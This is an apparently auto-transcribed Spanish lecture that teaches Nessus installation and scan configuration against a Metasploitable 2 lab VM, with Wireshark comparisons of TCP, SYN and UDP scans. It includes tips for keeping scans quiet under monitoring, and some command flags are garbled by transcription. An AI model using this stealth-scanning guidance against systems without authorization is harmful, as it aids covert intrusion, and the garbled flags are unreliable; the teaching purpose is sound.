Ok, listo. Profe, ¿qué tan difícil está el examen? ¿Es solo práctica o teoría? Es solamente teoría, de hecho, hay algunas situaciones, algunas preguntas donde les planteamos las cosas para que resuelvan o para que propongan una solución práctica. Sin embargo, es totalmente teórico, vaya. Y no está tan complicado, hombre, para nada. Estoy seguro que todos lo van a pasar y con buena calificación. No se preocupen por eso y no se estresen desde ahora. Es un examen sencillo, es un examen que si han asistido a todas las clases hasta el día de hoy, les aseguro que lo van a pasar y de manera muy fácil, muy sencilla. Así que bien, damas y caballeros, el día de hoy, como se los dije anteriormente, vamos a empezar con Nessus. Nessus es una herramienta un poco más potente de análisis de vulnerabilidades. ¿Por qué es más potente? Bueno, principalmente tiene una base de datos, la cual almacena plugins y scripts dedicados a la detección de muchas vulnerabilidades que conocemos actualmente y muchas vulnerabilidades de las cuales están públicas, por ejemplo, en las bases de datos que veíamos en las clases anteriores, en la National Vulnerability Database, en el marco de Mitre, CVE, y que todas las podemos localizar muy fácilmente con sus indicadores. Ya sabemos eso también. Bueno, el día de hoy nos queda el último paso del análisis de vulnerabilidades. Cuando nosotros ya hemos ejecutado herramientas un poco, digamos, más rústicas, más rudimentarias, como lo fueron, por ejemplo, Nmap, Nikto, SAP, podríamos decir que está un poquito más equipada. Sin embargo, igual aún no se le comparan a Nessus. Todas estas herramientas nos van a servir para una cosa, para un preanálisis. Es muy importante que todos sus análisis de vulnerabilidades no los basen enteramente en estas herramientas, sino al menos confirmen con Nessus o en todo caso con Qualys, por ejemplo, o con Alienbolt. Bueno, con un software un poco más especializado e incluso de ser posible de licencia o de paga. Sobre todo si se trata de que van a hacer ustedes un pentest, una auditoría, lo que sea que involucre un análisis de vulnerabilidades. Si no tienen hasta ese momento la herramienta, el recurso, la licencia para estos softwares un poco más premium, yo les recomendaría no se arriesguen tanto. Consigan el software premium, la licencia, de manera legal. Y bueno, a raíz de esta, sáquenle todo el provecho posible. Nessus no tiene tampoco una limitación en cuanto a cuántos escaneos, cuántos análisis podemos hacer. Absolutamente que no. Entonces, bueno, más o menos sáquenle la cuenta. Si invertimos tanto dinero en la licencia de Nessus, bueno, es lógico que yo para los servicios que voy a brindar, pues tengo que tener en cuenta que estoy utilizando o en mis costos tengo la licencia. Entonces, a raíz de esto también, decir, bueno, en base a lo que me van a pagar, lo invierto en comprar mi equipo, mi material, porque todo esto les puede otorgar mayor solidez, más prestigio. Imagínense si comparamos un escaneo de la versión profesional de Nessus contra un escaneo con Nmap Script Engine. Y no por menospreciar a Nmap Script Engine, en lo absoluto. Es una excelente herramienta. Sin embargo, ya a nivel real, a un nivel profesional, yo la verdad no recomendaría Nmap, no recomendaría Nikto, no recomendaría estas herramientas un poco más de línea de comandos que hemos visto, más que para un preanálisis nuevamente. Así que bien, el día de hoy vamos a hablar de Nessus y además vamos a empezar a introducirnos un poco a algunos conceptos de la explotación. Bien, si nosotros buscamos Nessus,
en nuestro buscador, inmediatamente nos va a aparecer escáner de vulnerabilidades Nessus, Tenable Nessus Essentials. Este es el que nosotros queremos y es el que nosotros vamos a utilizar. Existe una prueba de Nessus profesional, sin embargo, tampoco la recomiendo mucho porque de hecho la versión de prueba se toma como es una versión de prueba. No trae todas las capacidades que trae ya la versión Nessus profesional. ¿Ok? Entonces también tienen que tener muy en cuenta eso. Ahora bien, una vez que nosotros ya sabemos cuál es el que queremos, lo vamos a seleccionar. Y por ahí yo ya les había mandado un tutorial. Sin embargo, digamos que la estructura organizacional y corporativa a la que depende Tenable, la empresa desarrolladora de Nessus, pues a raíz de los años ha sufrido diversos cambios, como muchas empresas. Entonces, progresivamente van cambiando algunas dinámicas, en este caso, algunos enlaces, formas de instalación, productos. En este caso no hay ningún problema. Lo que vamos a hacer es registrarnos totalmente. Registrarnos. Una vez que nosotros nos registremos, estaríamos más que habilitados para empezar a utilizar Nessus. Este registro nos va a permitir o nos va, digamos, a otorgar una licencia, una key, la cual nosotros vamos a colocar cuando estemos configurando el propio Nessus. Ahora bien, aquí en la clase, ¿todos siguieron el tutorial? Permítanme, también se los voy a transmitir por aquí. Es un tutorial un poco viejo, déjenme decirles, pero la realidad es que no me interesa que la interfaz haya cambiado, no. Lo que más me interesaba mostrarles sobre todo eran los comandos necesarios, los comandos que se utilizan para realizar la instalación del paquete .deb. Ahora bien, permítanme un segundo. No tiene sonido, de hecho, es únicamente el video. Fíjense, de hecho era algo muy similar, muy parecido. Incluso le voy a poner mayor velocidad. Y mucho ojo, tienen que tener mucho cuidado con la versión que instalen. Anteriormente había algunas versiones de Nessus dedicadas enteramente a Kali Linux. Sin embargo, han dejado de salir actualizaciones. Esto sí, no ha cambiado. Linux, Debian, AMD64. ¿Por qué Debian? Porque es la arquitectura de Kali Linux, de nuestro sistema operativo. Entonces no podemos utilizar ningún otro. Puede ser que haya algunos otros que digan, por ejemplo, Ubuntu. Ubuntu también está desarrollado en Debian. Entonces, podríamos decir, bueno, es lo mismo, va a ser exactamente lo mismo. Pues no. Hay algunas cosas, algunas configuraciones especiales para Ubuntu, las cuales no tiene Kali, por ejemplo. Entonces podemos colisionar ahí algunas cositas con la versión. Por eso es muy importante que ustedes verifiquen que sea Debian, la última de Debian AMD64. Van a descargar y ojo, les va a generar un archivo como este que están viendo aquí. Podemos incluso verlo otra vez para ver cómo se genera. Lo extraemos, se nos genera una carpetita. Y fíjense cómo están los dos paquetes, uno que es el .deb y otro que es el AMD64. Inmediatamente nosotros vamos a hacer una asignación de permisos 777 al archivo, fíjense muy bien, .deb.
E inmediatamente vamos a hacer, fíjense, un sudo apt install punto guión o slash, como le quieran decir, Nessus, y es el archivo .deb nuevamente, al que le acabamos de dar permisos. Se instala y fíjense muy bien qué nos dice aquí y qué también les va a decir a ustedes. Puedes empezar el escáner de Nessus utilizando /bin systemctl nessusd.service. Y después nos dice que podemos ya ir a configurar nuestro escaneo. Ahora bien, vamos a ir hacia allá. Hay algunas cosas, como lo que van a ver aquí ustedes, que si se fijan, pues al parecer no da ese comando que nos dan por ahí. No inicia el servicio. ¿Y por qué se necesita esto? Iniciado el servicio, nosotros vamos a entrar a https Kali 8834. Yo ya tengo levantado el servicio. Ustedes inmediatamente que lo instalen el archivo que acaban de ver, van a correr este comando. Después de correr este comando, van a venir aquí a Kali 8834 y mucho ojo, con certificado SSL, no sin certificado SSL, no HTTP, HTTPS. Porque si ponen HTTP, ¿qué va a pasar? Y me van a mandar mensaje y me van a decir, profe, no sirve, ¿verdad? Entonces, hay que utilizar HTTPS. Empezamos. Y bueno, en este caso ustedes van a ver algunos escaneos que ya tengo y que ya he ejecutado. En este caso nosotros podemos iniciar un nuevo escaneo. En la parte de arriba a la derecha tenemos la opción de iniciar el nuevo escaneo o de añadir un nuevo escaneo. Vamos a tener, como nos dice por aquí, diversas plantillas. Incluso una plantilla definida por el usuario. Esto solo lo tengo yo. Sin embargo, también algunas personas del intermedio que hayan estado en alguno de los cursos de pago de nosotros, también seguramente tendrán esa misma template, de esa misma plantilla que creamos. Es para un escaneo sigiloso. Ahora bien, vamos a tener también varias opciones aquí. Primero nos dice Discovery y después Vulnerabilities y después Compliance. Esto es precisamente por lo que les comentaba. Para cada tipo de vulnerabilidad o para cada tipo de entorno, habrá un distinto método tanto de detección como de ejecución. En este caso, por ejemplo, lo que nosotros vamos a utilizar va a ser un escaneo básico de red, un escaneo avanzado o también pueden utilizar un escaneo dinámico avanzado, sin ningún problema. Sin embargo, fíjense cómo hay otros tipos de escaneos, validación de credenciales, escaneos de malware, escaneos de dispositivos móviles, escaneos de aplicaciones web, escaneos de Active Directory, escaneos, por ejemplo, para detectar vulnerabilidades relacionadas a la IA. Esto de hecho está muy bien porque te permite detectar vulnerabilidades sobre los LLMs, los Large Language Models, que son básicamente los modelos con los que están construidos ChatGPT actualmente y pues todos los modelos de inteligencia artificial. Si tienen el código, pueden analizarlo desde aquí, pueden también encontrar vulnerabilidades. Este es un nuevo, incluso entorno, podríamos decir, que hasta apenas hace unos años se acaba de empezar a incorporar en las auditorías. Entonces también les conviene saber de esto si quieren estar perfectamente a la moda y perfectamente actualizados.
En este caso vamos a empezar con nuestro escaneo básico de red. Nos vamos a dar cuenta, bueno, que podemos indicarle un nombre. Máquina 1. Pueden ponerle el nombre que quieran, la descripción que quieran, en el folder que quieran. Lo más importante es el target. Ahora bien, para efectos del día de hoy, de la práctica del día de hoy, por todo lo que representa el escaneo con Nessus, lógicamente no lo puedo correr o sería irresponsable de mi parte, la verdad, correrlo contra alguno de los objetivos reales que hemos estado verificando, puesto que va a generar una cantidad inmensa de tráfico. Sin embargo, por supuesto que no nos vamos a perder el ejemplo. Ahora bien, bajo un ejemplo real, por supuesto, podemos ejecutar el escaneo y por supuesto más aún si tenemos, por ejemplo, la autorización expresa o el contrato. Bien, en este caso yo tengo por aquí una máquina Metasploitable 2 Linux, como estarán viendo por aquí. Les voy a pasar al final de la clase, por ahí en el grupo de WhatsApp, el link para descargar esta máquina. Aunque yo les diría que es muy opcional. ¿Por qué es muy opcional? Metasploitable 2 es una excelente opción si nunca han tenido una interacción de hacking, si nunca han tenido, por ejemplo, encuentros con otras máquinas vulnerables, con otro tipo de objetivos vulnerables. Si nunca han hecho hacking, sí les voy a recomendar mucho que instalen Metasploitable 2. Y no solo que le instalen, también incluso que le escaneen con Nmap y con todo lo que esté a su disposición. Que hagan todo lo que hemos visto sobre esta máquina. Esta es una máquina vulnerable a propósito. ¿Qué quiere decir esto? Que es un laboratorio, bueno, que distintos investigadores de seguridad han hecho vulnerable. Por ejemplo, dejando alguna versión sin parchar, perdón, de alguna vulnerabilidad. Dejando, por ejemplo, cifrados criptográficos muy viejos. Eliminando cualquier clase de firewall. Es decir, esta es una máquina que está diseñada para que le exploten. Para investigación, para pruebas de seguridad, para practicar. Sin embargo, otra vez, a mí no me gustan tanto estos entornos ya locales, porque siento que ya los hemos mostrado muchísimo. Entonces, me parece más atractivo, sobre todo en algunas otras ocasiones, como en las clases pasadas, mostrarles cómo es que funciona un sistema real. Sin embargo, si quieren práctica, si quieren practicar de forma totalmente legal, aquí está Metasploitable 2. Sin embargo, otra vez, no es muy cercano a la realidad. Y vamos a ver ahora por qué. Lo primero que voy a hacer es un IPA. Con esto voy a mostrar la dirección IP de esta máquina, que es la .58.144. Nosotros ya sabemos que las direcciones IP son importantísimas siempre. Y es la 144, si no me equivoco. Recuerden también, revisar 2 veces. Si no están del todo seguros, revisen 2 veces. Vamos a tener una segunda opción, Schedule. ¿Esto qué quiere decir? Que podemos programar el escaneo, incluso con una frecuencia establecida. Una vez cada, no sé, cada semana, a tal hora, a tal día, con tal zona horaria. Sin embargo, en este caso, pues a nosotros no nos interesa mucho. Nos dice también que nos pueden enviar notificaciones. Esto solo aplica si ustedes tienen un servidor SMTP configurado. Si no lo tienen, no las pongan, tampoco las necesitamos. Y vamos a encontrarnos con una primera opción, que es la opción Port Scan. Y fíjense cómo dice Common Ports, es decir, los puertos comunes. Si ustedes recuerdan,
Nmap también decía algo así. Puertos comunes. Ahora bien, esta no es la única opción que tenemos. Tenemos también All Ports y una opción personalizada. En este caso, el objetivo del escaneo básico es hacer algo rápido. Entonces, a nosotros no nos interesa hacer algo súper dirigido aún. Nos interesa algo rápido. Vamos a dejar Port Scan Common Ports. Posteriormente vamos a tener el tipo de escaneo. Y bien, este también es muy importante y necesario que identifiquen bien qué tipo de escaneo utilizar. Default, por defecto, va a utilizar incluso varios plugins, varios scripts para escanear vulnerabilidades conocidas de distintos tipos y de distintas categorías. Si ustedes están buscando específicamente por vulnerabilidades web, aquí lo van a seleccionar. Si quieren hacer algo para vulnerabilidades web más rápido y más general, aquí está la opción. Para algo más complejo, es decir, algo más largo, algo más tedioso. Y tenemos también la opción Custom. Sin embargo, a nosotros no nos interesa ninguna de estas opciones. Nosotros no nos estamos concentrando en vulnerabilidades web en este momento. Nos estamos concentrando en explotación interna incluso. O en lograr, en todo caso, alguna clase de ejecución remota de código, como lo hemos visto en clases pasadas con el objetivo real. Ahora bien, vamos a dejarle default. Y en la parte de processing, vamos a tener algunas opciones importantes. Por ejemplo, override normal verbosity. ¿Qué quiere decir esto? El reporte que nos va a lanzar Nessus, que nos va a permitir, bueno, descargar Nessus una vez que termine su escaneo, su análisis, puede tener mucha más información o menos información. Todo dependerá de la opción que le coloques. En este caso, si tienes un espacio muy limitado del disco, puedes reducir la información lo más que se pueda de esta manera. O también, si no te importa tanto el peso, adelante, que reporte tanta información como encuentre, tanta información como sea posible. Todas las demás opciones realmente las vamos a dejar como están. Hay algunas interesantes que puede ser, por ejemplo, esta. Display host that respond to ping. ¿Qué quiere decir esto? Que el reporte va a indicar los objetivos que respondieron satisfactoriamente a un ping. ¿Qué es un ping? Pues bueno, nosotros hablábamos que un ping es esto, simplemente un envío de un paquetito ICMP, el cual uno es una request, una reply, y el otro es una respuesta. Ahora bien, aquí lo que nos interesa es esa transmisión del paquete. Cuando nosotros hacemos un ping google.com aquí en Kali, nuestra línea de comandos, fíjense cómo dice, bueno, ping Google, aparece la dirección de Google, 5684 bytes, este es el tamaño de datos. Y lanza un paquete que dice ICMP, sec igual a 1. Esto quiere decir que se está lanzando un paquete desde nuestra máquina Kali, desde nuestra máquina 192.168.58.135 hacia 142.251.34.14. Un paquete ICMP proveniente de nosotros, pues bueno, se está viendo reflejado por ahí en su tráfico. ¿Esto para qué nos sirve? Generalmente ping se utiliza para cuestiones de troubleshooting o simplemente para comprobar
que un host está activo, que está levantado, que está dando respuesta. En este caso, por ejemplo, Google está recibiendo el paquete y lo está procesando de manera correcta. No lo está perdiendo, no le está pasando nada. Nos dice que se ha transmitido y que se ha recibido. Ahora bien, esto quiere decir que si nosotros en el escaneo, aquí, le indicamos, por ejemplo, un rango completo, como un 24 o un 16, de todas las direcciones IP, bueno, nos va a marcar, nos va a colocar por aquí en el reporte las que hayan respondido al ping, las que hayan dicho un paquete transmitido, un paquete recibido. De esta manera, nosotros también podemos ver qué otros objetivos dentro de la red están levantados o están prendidos. Y realmente eso sería lo único que nos puede interesar de aquí. Ahora bien, llegamos a la parte de Advanced. Advanced tampoco tiene mucho misterio. En el escaneo básico realmente no se busca una personalización, sino otra vez, algo rápido. Lanzarlo rápido. Bien. Tenemos algunas otras ventanas que son credentials y plugins. En este caso, vamos a tener, por ejemplo, credentials. Y credentials aquí, pues viene como una opción, la cual nos permite rellenar con información. Sin embargo, esto a nosotros no nos interesa. ¿Por qué? Porque no estamos por auditar ni un servicio de SSH ni Windows. Si nos interesara sobre la infraestructura, la IP, que estamos haciéndole la auditoría o el pentest, nos interesara probar también específicamente SSH, lo más conveniente es que las claves de SSH se las pasen aquí a Nessus para que Nessus pueda hacer el escaneo completo y que tenga toda la cobertura que debe de tener. En este caso, pues no nos interesa nuevamente. Y plugins, ya iremos a esta pestañita en el siguiente tipo de escaneo. Muy interesante también. Sin embargo, hasta ahora, lo único que necesitamos es esta dirección IP. Y lo que vamos a hacer es save. Y lo vamos a tener por aquí. Si hacemos un launch, nos vamos a dar cuenta que el escaneo empieza. Está corriendo. Vamos a darle unos cuantos minutos. A mí me arrojó error al instalar, dice por ahí Stephanie. ¿Dónde te arrojó error, Stephanie? ¿O qué error te alojó? Yo sí, profe, ya lo estoy ejecutando. LinkedIn post. Nessus tiene agentes para que lo haga de forma automatizada. Correcto. Ya la tengo instalada. También ya la tengo instalada. Perfecto. Y quiero que se den cuenta cómo acaba de empezar a aparecer información. Y sigue corriendo el escaneo. Ahora se darán cuenta, señores, cómo es muy diferente un escaneo con Nmap a un escaneo con una herramienta profesional como lo es Nessus. Incluso ya tenemos una vulnerabilidad. ¿Y qué creen? Aquí están todos los indicadores de los que hemos hablado. Hi, esto es parte del CBSS. Ya lo saben eso ustedes perfectamente. Esto incluso va implícito con ¿qué? Con la calificación obtenida. 7.5. Es de bastante riesgo, ¿eh?
Aquí mismo recordarán ustedes que yo les había explicado que el CBSS toma distintas métricas o distintas preguntas para evaluar las vulnerabilidades. Bueno, muchas de estas nomenclaturas que están viendo significan una cosa en concreto. Por ejemplo, disponibilidad de exploit, permisos requeridos para ejecutar, por ejemplo, impacto a la confidencialidad, a la integridad, a la disponibilidad. Y otra cosa, existe también algo que deben de tener muy en cuenta. Pues qué mal que no tengan ni siquiera el dominio, pero bueno. Aquí está la página de First. Ya no existe, o bueno, existe, pero lo de ahora es la versión 4.0. Esta versión es mucho más refinada en cuanto a la métrica de calificación. Sin embargo, ese mismo refinamiento, esa complejidad para calcular, gracias a esta versión, una calificación de riesgo de una vulnerabilidad, pues como que muchos sistemas o muchas aplicaciones no le implementan y siguen utilizando el 3.0, como por ejemplo Nessus o incluso como la gran mayoría de herramientas. Ahora bien, hay algunas otras, como por ejemplo, y lo he visto, por ejemplo en Qualys, donde sí se utiliza ya la versión 4.0. Y esta versión sí puede influir a nivel de reporte de pentesting. Porque si una versión la marca una vulnerabilidad con una calificación más baja o más alta, pues lógicamente puede implicar, no sé, prioridad de parcheo, una más que otra. Entonces se debe de tener muchísimo cuidado con estas calificaciones. Yo les recomiendo utilizar la versión 4.0. Sin embargo, si no se tiene el CVE exacto, va a ser complicado determinar esa calificación. Va a ser bastante complicado. Así que bueno, específicamente quiero que vean cómo va avanzando nuestro escaneo. 3 vulnerabilidades críticas, 3 vulnerabilidades de riesgo alto, 7 de riesgo medio, una de riesgo bajo. Y fíjense toda la información que tenemos. ¿Qué es esto? Esto básicamente es lo mismo que hemos venido haciendo con Nmap y con todas las herramientas de reconocimiento. Lo que hace Nessus es que, bueno, con sus crawlers y con sus plugins, empieza a hacer lo mismo, porque debe de hacerlo todo en conjunto. Tanto, por ejemplo, ese descubrimiento del host que hace Nmap, como ese análisis de los puertos, como ese análisis de las versiones, como ese análisis de los servicios activos. Entonces, aquí se concentra mucha información. Y fíjense, creo que ya terminó. No. Siguen apareciendo vulnerabilidades. Esto ya nos puede dar de sí una conclusión. Vamos a dejar, por supuesto, que se finalice el escaneo. Y mientras tanto, quiero que veamos el segundo tipo de escaneo. En este caso estoy hablando del escaneo avanzado. Este es un escaneo mucho más complejo.
No puedo realmente tampoco entrar demasiado en profundidad en porque hay muchas cosas a tener en cuenta. Sin embargo, bueno, voy a intentar decirles lo más importante y lo que más se necesita y lo que más se utiliza. Ahora bien, si se fijan, las opciones acaban de cambiar drásticamente. Ya no es una simple selección de una opción pequeña. Ya son muchas casillas, muchas opciones. Otra vez, Nessus hace algo muy similar a lo que hace Nmap. Primero, tiene que hacer ese host discovery. Tiene que verificar que el target, que el objetivo que vamos a atacar, realmente esté activo. No pueden atacar o no se puede atacar algo que no esté activo, que no esté levantado. ¿Estamos de acuerdo, no? Entonces, con esto vamos a ser capaces de refinar de qué manera va a descubrir el host. Por ejemplo, recordarán que a mí me gusta utilizar una opción que es -pien. ¿Qué quiere decir esto? Que no habrá ese ping. Ese que nosotros hacíamos hacia Google no existirá. No va a comprobar de esta manera Nessus si el host está activo. Y esto es bastante bueno. O al menos editarlo de cierta manera es bastante bueno. Aquí tiene ciertas opciones, incluso muy parecidas a Nmap. Tiene una opción, por ejemplo, para hacer un descubrimiento rápido de la red. Esto, por ejemplo, es lo equivalente al -F mayúscula de Nmap, que haga un barrido rápido, nada más para identificar servicios. Ahora, nos dice, bueno, ¿y cómo quieres que comprobemos que realmente el host está activo? Lo podemos hacer con una ARP, con un TCP, con un ICMP o con un UDP. ¿Cómo quieres? Bueno, lo más usual siempre va a ser que utilicemos un ICMP. Sin embargo, en términos ofensivos, hay muchas ocasiones donde los ecos ICMP pueden estar bloqueados o pueden tener cierta lupa en ellos. Así que vamos a decir, bueno, yo no quiero en absoluto mandar ningún ICMP. Quiero que todo se detecte a través de TCP. Y de esta manera podemos tener incluso un poquito más de discreción para detectar cuando el host esté activo o inactivo, claro. En esta parte de escaneo de puertos, port scanning, muy similar, muy similar a Nmap. Considerar los puertos sin escanear como cerrados. Es decir, cuando nosotros en Nmap especificamos -P, 21, 22, 23, 80, 80, 80 y todos los puertos restantes están cerrados para nosotros. Los únicos que nos interesan son estos. Todos los demás están cerrados. Todos los demás aparecen como cerrados. Esto puede ser bueno en ciertas ocasiones. Si no queremos generar un ruido adicional, podemos fácilmente también seleccionar qué puertos queremos analizar en busca de las vulnerabilidades y especificárselo aquí o especificar un rango del 1 al 100, del 1 al 1000, del 1 al 10, como ustedes quieran. Realmente, aquí lo importante de esta opción es que no se va a mandar ningún paquete buscando, bueno, comprobar si los otros puertos están activos, sino que se va a concentrar solo
en los que nosotros le estamos diciendo. Y esto sí puede ser bueno, sí puede ayudar. Porque en algunas ocasiones, si esta opción no está marcada, aunque nosotros le indiquemos un rango, puede ser que a algunos otros puertos de más alto nivel también se les mande algún paquetito para buscar si dan respuesta o no. Puertos que no necesariamente están establecidos aquí en este rango default. Eso puede delatar también nuestro escaneo. Entonces, en este caso, pues podemos dejarlo incluso tal que así. Realmente la intrusividad en este caso contra la máquina que estamos ejecutando este escaneo no nos interesa mucho. Así que podemos ser lo intrusivos que queramos. No es el mismo caso, por ejemplo, contra un objetivo real. ¿Estarán de acuerdo? Otra cosa muy importante es esto. Los enumeradores de puertos locales. ¿Qué quiere decir esto? Servicios SSH, WMI, muy parecido a SSH pero Windows, SNMP. Todos estos yo les recomendaría desactivarlos por completo. Porque en este caso no le estamos proporcionando absolutamente nada. No le estamos proporcionando, por ejemplo, ninguna credencial de SSH ni de SNMP. Entonces, en este caso, bueno, podríamos dejar esta de SSH abierta por si el puerto SSH estuviera prendido y nos permitiera acceso anónimo. Sin embargo, en un caso real, muy probablemente eso no suceda. Así que se los dejo por ahí. Y otra opción fundamental de este escaneo. ¿Qué tipo de escaneo de puerto vas a utilizar? TCP, SYN, UDP. TCP, SYN o UDP. TCP, SYN, UDP. ¿Cuál? Y se los pregunto aquí a ustedes, muchachos. ¿Cuál es el más seguro por todo lo que han aprendido? TCP, SYN, UDP. ¿Cuál pondrán ustedes? SYN. ¿Correcto? ¿Están todos de acuerdo? TCP. ¿Por qué TCP? Casi todos dicen TCP, ¿verdad? TCP, SYN. ¿Alguien que nos pueda justificar su respuesta? ¿Por qué TCP? ¿Por qué utilizarían TCP? ¿O por qué utilizarían SYN? Y los leemos aquí en clase. Recuerden, TCP, SYN, UDP. Ya ustedes conocen las características de cada uno de estos. Exactamente, Sebastián. Exactamente, Sebastián, nuevamente. A ver, están correctos los que dicen TCP. Realmente no es que estén mal. En absoluto. Sin embargo, en este caso sí puede aplicar TCP. Porque les acabo de decir, no nos importa la intrusividad. No nos importa el tráfico. Entonces podemos lanzarlo perfectamente. TCP. ¿Qué significa o qué implicaría que utilicemos TCP? Bueno, pues muy fácil. Si ustedes conocen un poquito de cómo funciona TCP, sabrán que TCP utiliza un three-way handshake y que además genera una conexión. Todo esto incluso nosotros lo podemos verificar en Wireshark para ver si realmente está haciendo esto
o no. Por ejemplo, voy a poner aquí muy rápidamente un filtro. Esto no es necesario que lo hagan ustedes, por supuesto, solamente que yo se los quiero poner como demostración, claro. ¿Cuál es nuestra IP? 135, no, no 145. 135, así. Y fíjense lo que vamos a hacer. Contra un solo puerto, para ejemplificar esto que les digo. Y para que ustedes mismos vean cómo es que todo esto funciona. Sí, yo creo que con este está bien. Fíjense. Ay, y agregué una bandera más ahí. Fíjense. Es que no está capturando con razón. Fíjense. Y qué interesante. No sé si ustedes ya habían visto esto. O ya conocían esto. Si nosotros hacemos un análisis del tráfico generado entre un escaneo de Nmap, nos vamos a dar cuenta de muchas cositas. Lo que estoy haciendo es colocar primero la dirección IP de nuestro objetivo, seguido de la nuestra. Sin embargo, al nosotros aplicar el filtro, ¿qué es lo que vemos? Un montón de paquetes TCP. Fíjense, todos. Sin, sin ACK, RST ACK, ACK. Y toda una secuencia. Ahora bien, imagínense que ya no queremos esto. Imagínense que utilizamos un "-ss". Ahora bien, ¿hay reducción en el ruido? ¿Sí o no? ¿Disminuyeron los paquetes? Sí, sí. Todo esto, señoras y señores, es el tráfico de la red. Es lo que estamos originando en base a estos escaneos. ¿Qué diferencia tan grande? Solo son 3 paquetitos. Bien. Este es un escaneo UDP. ¿Y por qué cambié de puerto? Pues porque el puerto 53 corresponde a uno de los puertos operados por UDP. Es el que generalmente se utiliza para el DNS. Ahora, fíjense también los paquetes generados. Son 9 paquetes. Aquí abajo tenemos, ¿cuántos son? 9 paquetes.
Les vuelvo a preguntar. ¿Qué escaneo utilizamos? TCP, SYN, UDP. ¿Qué consideran? Si lo que buscamos, ojo, es sigilo. ¿Qué escaneo? TCP, SYN, UDP. Correcto, damas y caballeros. Correcto. Y fíjense cómo vamos demostrando realmente todas estas interacciones. Y es muy importante que conozcamos realmente cómo operan, porque de otra manera no sabemos ni siquiera qué estamos haciendo. Una de las maneras de visualizar esto es precisamente con uno de los comandos que les había comentado, -1. Esto hace un debugging completo e incluso nos indica los paquetes que manda y los paquetes que recibe, las respuestas que obtiene y cómo las interpreta. De esta manera, ejemplificamos que realmente sí hay diferencia entre escaneos. Y mucha. En esta materia, señores, esto sí importa. Porque no es lo mismo 3 paquetes a 9. En términos de monitoreo, no es para nada lo mismo. Ahora bien, ya que sabemos esto, vamos a dejarlo simplemente marcado. SYN. Ahora bien, nos interesa también descubrir los servicios. ¿Qué es esto? Saber qué servicio y qué versión están alojados en cada puerto. Lo mismo que hace Nmap. Realmente aquí, bueno, ni siquiera le recomendaría moverle. Está bien así. Si se trata de un entorno Active Directory, cliquean esta información. Sin embargo, en este caso, no es la ocasión. En Assessment, nosotros vamos a tener también varias opciones. Por ejemplo, le podemos decir que muestre los falsos positivos o que no muestre los falsos positivos. Todo puede depender de los objetivos del escaneo de cada uno. Si, bueno, ustedes dicen, ¿sabes qué? Esta infraestructura está muy pequeña. Necesito incluso comprobar los falsos positivos o buscar los falsos positivos para ver si pueden ser punto de inyección, para ver si pueden ser vector de ataque. Bajo esos casos se puede mostrar. Incluso pueden desactivarlo. Realmente tampoco influye demasiado. En este caso, sí, no le recomendaría esta opción. Esta opción lo que hace es que, bueno, en lugar de utilizar, por ejemplo, un plugin e ir escaneando poquito a poco, no tan a profundidad, de una manera moderada, con esta opción lo que hace es forzar al plugin a que vaya de una manera mucho más rápida. Sin embargo, esto no nos interesa realmente. Esto de SMTP tampoco. Mucho ojo, fuerza bruta. De hecho, este es un tema que vamos a tocar en otra ocasión. Sin embargo, si vemos que hay, por ejemplo, un panel de login, pues muy probablemente vamos a querer probar fuerza bruta. Aquí podemos añadir, por ejemplo, el archivo de login, el archivo de contraseña y realmente nada más. Podemos incluso activarle Hydra. Es buena opción si sabemos que el propio objetivo tiene algún panel de login
Si sabemos que el objetivo tiene algún formulario, puede ser bueno. En este caso, no nos interesa. Esto únicamente para Oracle. Web Application como tal, no vamos a escanear la aplicación web. Sin embargo, y esto sí me gustaría decírselos, por si no lo saben, vamos a ver si me da respuesta. Esperemos un poquitito. A ver con HTTP. Hay aquí en Metasploitation, o es esta la que no lo trae. No recuerdo exactamente. Pero incluso se los confirmo. Estaba haciendo esto. 144, 168. Ya sé cuál es el problema. Si es punto 58, punto 144. Por eso les digo, tenemos que fijarnos muy bien incluso en las direcciones IP que copiamos y que pegamos. Aquí está el resultado, aquí está lo que les decía. Metasploitable 2 trae, digamos, algunos laboratorios vulnerables dentro de su misma infraestructura. Por ejemplo, trae este phpMyAdmin con el cual podemos probar, por ejemplo, fuerza bruta. Trae, por ejemplo, Mutigidae. Mutigidae en su tiempo era lo que hoy es, por ejemplo, Portzwigger, lo que era, por ejemplo, Hack the Box, Try Hack Me. Esta fue la base de todo eso, de aquí salió todo eso. Solamente que allá lo capitalizaron y lo están vendiendo como membresías. Y esto era abierto, esto era conocimiento gratuito para el que quisiera practicar. No necesitabas ninguna suscripción ni nada. Simplemente descargar, montar y ponerte a practicar. Por eso es que también muchas veces les digo que no estoy muy de acuerdo con algunos de esos proveedores. Bien, no entraremos en más discusión sobre eso. Sin embargo, aquí, por ejemplo, ustedes pueden practicar inyección, cross-site scripting, back, pueden probar también IDOR, cross-site request for Jerry, security misconfiguration, almacenamiento criptográfico inseguro, redirecciones invalidadas. Esto es interesante, ¿eh? Y esto se da mucho ahora. Así que, bueno, si lo quieren investigar también. Y bueno, con esto lo que les quería comentar, pues es que tenemos también con esta máquina virtual la opción, digamos, de vulnerarla de distintas formas, de distintas maneras. En este caso, nosotros vamos a utilizar una opción muy especial y muy en particular. Regresando a nuestros escaneos con Nessus. En este caso, no vamos a ejecutar ni vamos, bueno, a vulnerar ni a analizar ningún Windows. Es por esto que vamos a desactivar todos los métodos de numeración de Windows, porque no nos sirven en absoluto. Únicamente nos van a estar haciendo ruido, nos van a estar causando lag, nos van a estar consumiendo recursos. Y pues no pasa nada si los desactivamos, porque no estamos analizando un Windows, estamos de acuerdo, ¿no? La propia máquina lo dice, esto es Linux. No tiene lógica que escaneemos por Windows. En este caso vamos a dejar todo tal como está. La parte del report es exactamente también igual al escaneo básico. No hay diferencias. Sin embargo, aquí sí hay una opción
